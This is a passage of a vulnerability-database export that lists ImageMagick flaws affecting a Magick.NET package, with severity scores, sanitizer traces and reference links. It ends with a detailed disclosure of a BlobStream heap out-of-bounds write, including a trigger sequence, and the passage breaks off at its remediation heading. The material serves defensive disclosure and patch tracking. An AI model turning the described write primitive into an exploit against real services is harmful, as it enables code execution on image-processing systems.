vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-26983, GHSA-w8mw-frc6-r7m8
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jcjk-s89c-mbbm
34
url VCID-jvq6-xjbu-fkb9
vulnerability_id VCID-jvq6-xjbu-fkb9
summary 
ImageMagick: Infinite loop vulnerability when parsing a PCD file
When a PCD file does not contain a valid marker, the DecodeImage() function becomes trapped in an infinite loop while searching for the marker, causing the program to become unresponsive and continuously consume CPU resources, ultimately leading to system resource exhaustion and denial of service.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24485.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24485.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-24485
reference_id
reference_type
scores
0
value 0.00018
scoring_system epss
scoring_elements 0.04815
published_at 2026-04-21T12:55:00Z
1
value 0.00018
scoring_system epss
scoring_elements 0.04674
published_at 2026-04-18T12:55:00Z
2
value 0.00018
scoring_system epss
scoring_elements 0.04666
published_at 2026-04-16T12:55:00Z
3
value 0.00018
scoring_system epss
scoring_elements 0.04698
published_at 2026-04-13T12:55:00Z
4
value 0.00018
scoring_system epss
scoring_elements 0.04682
published_at 2026-04-04T12:55:00Z
5
value 0.00018
scoring_system epss
scoring_elements 0.04733
published_at 2026-04-11T12:55:00Z
6
value 0.00018
scoring_system epss
scoring_elements 0.04742
published_at 2026-04-09T12:55:00Z
7
value 0.00018
scoring_system epss
scoring_elements 0.0473
published_at 2026-04-08T12:55:00Z
8
value 0.00018
scoring_system epss
scoring_elements 0.04696
published_at 2026-04-07T12:55:00Z
9
value 0.00018
scoring_system epss
scoring_elements 0.04715
published_at 2026-04-12T12:55:00Z
10
value 0.00057
scoring_system epss
scoring_elements 0.17962
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-24485
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24485
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24485
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:48:11Z/
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/332c1566acc2de77857032d3c2504ead6210ff50
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:48:11Z/
url https://github.com/ImageMagick/ImageMagick/commit/332c1566acc2de77857032d3c2504ead6210ff50
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pqgj-2p96-rx85
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:48:11Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pqgj-2p96-rx85
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-24485
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-24485
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442091
reference_id 2442091
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442091
10
reference_url https://github.com/advisories/GHSA-pqgj-2p96-rx85
reference_id GHSA-pqgj-2p96-rx85
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-pqgj-2p96-rx85
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-24485, GHSA-pqgj-2p96-rx85
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jvq6-xjbu-fkb9
35
url VCID-kdw5-8y5z-zya5
vulnerability_id VCID-kdw5-8y5z-zya5
summary 
ImageMagick: Possible memory leak in ASHLAR encoder
A memory leak in the ASHLAR image writer allows an attacker to exhaust process memory by providing a crafted image that results in small objects that are allocated but never freed.

```
==880062== Memcheck, a memory error detector
==880062== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==880062== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info
==880062== 
==880062== 
==880062== HEAP SUMMARY:
==880062==     in use at exit: 386,826 bytes in 696 blocks
==880062==   total heap usage: 30,523 allocs, 29,827 frees, 21,803,756 bytes allocated
==880062== 
==880062== LEAK SUMMARY:
==880062==    definitely lost: 3,408 bytes in 3 blocks
==880062==    indirectly lost: 88,885 bytes in 30 blocks
==880062==      possibly lost: 140,944 bytes in 383 blocks
==880062==    still reachable: 151,573 bytes in 259 blocks
==880062==         suppressed: 0 bytes in 0 blocks
==880062== Reachable blocks (those to which a pointer was found) are not shown.
==880062== To see them, rerun with: --leak-check=full --show-leak-kinds=all
==880062== 
==880062== For lists of detected and suppressed errors, rerun with: -s
==880062== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25637.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25637.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25637
reference_id
reference_type
scores
0
value 0.00018
scoring_system epss
scoring_elements 0.04614
published_at 2026-04-21T12:55:00Z
1
value 0.00056
scoring_system epss
scoring_elements 0.17372
published_at 2026-04-16T12:55:00Z
2
value 0.00056
scoring_system epss
scoring_elements 0.17429
published_at 2026-04-13T12:55:00Z
3
value 0.00056
scoring_system epss
scoring_elements 0.17481
published_at 2026-04-12T12:55:00Z
4
value 0.00056
scoring_system epss
scoring_elements 0.1753
published_at 2026-04-11T12:55:00Z
5
value 0.00056
scoring_system epss
scoring_elements 0.17517
published_at 2026-04-09T12:55:00Z
6
value 0.00056
scoring_system epss
scoring_elements 0.17458
published_at 2026-04-08T12:55:00Z
7
value 0.00056
scoring_system epss
scoring_elements 0.17366
published_at 2026-04-07T12:55:00Z
8
value 0.00056
scoring_system epss
scoring_elements 0.17584
published_at 2026-04-04T12:55:00Z
9
value 0.00056
scoring_system epss
scoring_elements 0.17539
published_at 2026-04-02T12:55:00Z
10
value 0.00056
scoring_system epss
scoring_elements 0.1738
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25637
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/commit/30ce0e8efbd72fd6b50ed3a10ae22f57c8901137
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/30ce0e8efbd72fd6b50ed3a10ae22f57c8901137
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gm37-qx7w-p258
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gm37-qx7w-p258
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25637
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25637
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442114
reference_id 2442114
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442114
9
reference_url https://github.com/advisories/GHSA-gm37-qx7w-p258
reference_id GHSA-gm37-qx7w-p258
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gm37-qx7w-p258
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25637, GHSA-gm37-qx7w-p258
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kdw5-8y5z-zya5
36
url VCID-kefv-kpkk-wudf
vulnerability_id VCID-kefv-kpkk-wudf
summary 
ImageMagick has Division-by-Zero in YUV sampling factor validation, which leads to crash
A logic error in YUV sampling factor validation allows an invalid sampling factor to bypass checks and trigger a division-by-zero during image loading, resulting in a reliable denial-of-service.

```
coders/yuv.c:210:47: runtime error: division by zero
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3543373==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x55deeb4d723c bp 0x7fffc28d34d0 sp 0x7fffc28d3320 T0)
    #0 0x55deeb4d723c in ReadYUVImage coders/yuv.c:210
    #1 0x55deeb751dff in ReadImage MagickCore/constitute.c:743
    #2 0x55deeb756374 in ReadImages MagickCore/constitute.c:1082
    #3 0x55deec682375 in CLINoImageOperator MagickWand/operation.c:4959
    #4 0x55deec6887ed in CLIOption MagickWand/operation.c:5473
    #5 0x55deec32843b in ProcessCommandOptions MagickWand/magick-cli.c:653
    #6 0x55deec32b99b in MagickImageCommand MagickWand/magick-cli.c:1392
    #7 0x55deec324d58 in MagickCommandGenesis MagickWand/magick-cli.c:177
    #8 0x55deead82519 in MagickMain utilities/magick.c:162
    #9 0x55deead828be in main utilities/magick.c:193
    #10 0x7fb90807fd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #11 0x7fb90807fe3f in __libc_start_main_impl ../csu/libc-start.c:392
    #12 0x55deead81974 in _start (/data/ylwang/LargeScan/targets/ImageMagick/utilities/magick+0x22fb974)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: UNKNOWN SIGNAL coders/yuv.c:210 in ReadYUVImage
==3543373==ABORTING
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25799.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25799.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25799
reference_id
reference_type
scores
0
value 0.00019
scoring_system epss
scoring_elements 0.05259
published_at 2026-04-21T12:55:00Z
1
value 0.00019
scoring_system epss
scoring_elements 0.05106
published_at 2026-04-18T12:55:00Z
2
value 0.00019
scoring_system epss
scoring_elements 0.05102
published_at 2026-04-16T12:55:00Z
3
value 0.00019
scoring_system epss
scoring_elements 0.05159
published_at 2026-04-13T12:55:00Z
4
value 0.00019
scoring_system epss
scoring_elements 0.05172
published_at 2026-04-12T12:55:00Z
5
value 0.00019
scoring_system epss
scoring_elements 0.05189
published_at 2026-04-11T12:55:00Z
6
value 0.00019
scoring_system epss
scoring_elements 0.05219
published_at 2026-04-09T12:55:00Z
7
value 0.00019
scoring_system epss
scoring_elements 0.05202
published_at 2026-04-08T12:55:00Z
8
value 0.00019
scoring_system epss
scoring_elements 0.05168
published_at 2026-04-07T12:55:00Z
9
value 0.00019
scoring_system epss
scoring_elements 0.05147
published_at 2026-04-04T12:55:00Z
10
value 0.0006
scoring_system epss
scoring_elements 0.19061
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25799
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25799
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25799
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/49000e7298fbfdd759ac2c46f740f40c2e9b7452
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/49000e7298fbfdd759ac2c46f740f40c2e9b7452
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-543g-8grm-9cw6
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:22:05Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-543g-8grm-9cw6
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25799
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25799
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442120
reference_id 2442120
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442120
10
reference_url https://github.com/advisories/GHSA-543g-8grm-9cw6
reference_id GHSA-543g-8grm-9cw6
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-543g-8grm-9cw6
11
reference_url https://usn.ubuntu.com/8127-1/
reference_id USN-8127-1
reference_type
scores
url https://usn.ubuntu.com/8127-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25799, GHSA-543g-8grm-9cw6
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kefv-kpkk-wudf
37
url VCID-mntx-6yku-3qcx
vulnerability_id VCID-mntx-6yku-3qcx
summary 
ImageMagick: SVG-to-MVG Command Injection via coders/svg.c
An attacker can inject arbitrary MVG (Magick Vector Graphics) drawing commands in an SVG file that is read by the internal SVG decoder of ImageMagick. The injected MVG commands execute during rendering.
references
0
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 0.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
1
reference_url https://github.com/ImageMagick/ImageMagick/commit/9db96365ecab5de69cdec81b9359672b3a827aaa
reference_id
reference_type
scores
0
value 0.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/9db96365ecab5de69cdec81b9359672b3a827aaa
2
reference_url https://github.com/ImageMagick/ImageMagick/commit/f63c78b3828933f1cc7cf499390248981af765aa
reference_id
reference_type
scores
0
value 0.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/f63c78b3828933f1cc7cf499390248981af765aa
3
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xpg8-7m6m-jf56
reference_id
reference_type
scores
0
value 0.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xpg8-7m6m-jf56
4
reference_url https://github.com/advisories/GHSA-xpg8-7m6m-jf56
reference_id GHSA-xpg8-7m6m-jf56
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xpg8-7m6m-jf56
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases GHSA-xpg8-7m6m-jf56
risk_score 1.4
exploitability 0.5
weighted_severity 2.7
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mntx-6yku-3qcx
38
url VCID-mxg1-261s-nbds
vulnerability_id VCID-mxg1-261s-nbds
summary 
ImageMagick BlobStream Forward-Seek Under-Allocation
**Reporter:** Lumina Mescuwa  
**Product:** ImageMagick 7 (MagickCore)  
**Component:** `MagickCore/blob.c` (Blob I/O - BlobStream)  
**Tested:** 7.1.2-0 (source tag) and 7.1.2-1 (Homebrew), macOS arm64, clang-17, Q16-HDRI  
**Impact:** Heap out-of-bounds **WRITE** (attacker-controlled bytes at attacker-chosen offset) → memory corruption; potential code execution  

---

## Executive Summary

For memory-backed blobs (**BlobStream**), [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) permits advancing the stream **offset** beyond the current end without increasing capacity. The subsequent [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) then expands by **`quantum + length`** (amortized) instead of **`offset + length`**, and copies to `data + offset`. When `offset ≫ extent`, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2⁶⁴ arithmetic wrap, external delegates, or policy settings are required.

---

## Affected Scope

- **Versions confirmed:** 7.1.2-0, 7.1.2-1
    
- **Architectures:** Observed on macOS arm64; architecture-agnostic on LP64
    
- Paths: MagickCore blob subsystem — **BlobStream** ([`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) and [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)).
    
- **Not required:** External delegates; special policies; integer wraparound
    

---

## Technical Root Cause

**Types (LP64):**  
`offset: MagickOffsetType` (signed 64-bit)  
`extent/length/quantum: size_t` (unsigned 64-bit)  
`data: unsigned char*`

**Contract mismatch:**

- [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) (BlobStream) updates `offset` to arbitrary positions, including past end, **without** capacity adjustment.
    
- [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) tests `offset + length >= extent` and grows **by** `length + quantum`, doubles `quantum`, reallocates to `extent + 1`, then:
    
    ```
    q = data + (size_t)offset;
    memmove(q, src, length);
    ```
    
    There is **no guarantee** that `extent ≥ offset + length` post-growth. With `offset ≫ extent`, `q` is beyond the allocation.
    

**Wrap-free demonstration:**  
Initialize `extent=1`, write one byte (`offset=1`), seek to `0x10000000` (256 MiB), then write 3–4 bytes. Growth remains << `offset + length`; the copy overruns the heap buffer.

---

## Exploitability & Reachability

- **Primitive:** Controlled bytes written at a controlled displacement from the buffer base.
    
- **Reachability:** Any encode-to-memory flow that forward-seeks prior to writing (e.g., header back-patching, reserved-space strategies). Even if current encoders/writers avoid this, the API contract **permits** it, thus creating a latent sink for first- or third-party encoders/writers.
    
- **Determinism:** Once a forward seek past end occurs, the first subsequent write reliably corrupts memory.
    

---

## Impact Assessment

- **Integrity:** High - adjacent object/metadata overwrite plausible.
    
- **Availability:** High - reliably crashable (ASan and non-ASan).
    
- **Confidentiality:** High - Successful exploitation to RCE allows the attacker to read all data accessible by the compromised process.
    
- **RCE plausibility:** Typical of heap OOB writes in long-lived image services; allocator/layout dependent.
    

---

## CVSS v3.1 Rationale (9.8)

- **AV:N / PR:N / UI:N** - server-side image processing is commonly network-reachable without auth or user action.
    
- **AC:L** - a single forward seek + write suffices; no races or specialized state.
    
- **S:U** - corruption localized to the ImageMagick process.
    
- **C:H / I:H / A:H** - A successful exploit leads to RCE, granting full control over the process. This results in a total loss of Confidentiality (reading sensitive data), Integrity (modifying files/data), and Availability (terminating the service).
    

_Base scoring assumes successful exploitation; environmental mitigations are out of scope of Base metrics._

---

## Violated Invariant

> **Before copying `length` bytes at `offset`, enforce `extent ≥ offset + length` with overflow-checked arithmetic.**

The BlobStream growth policy preserves amortized efficiency but fails to enforce this **per-write** safety invariant.

---

## Remediation (Principle)

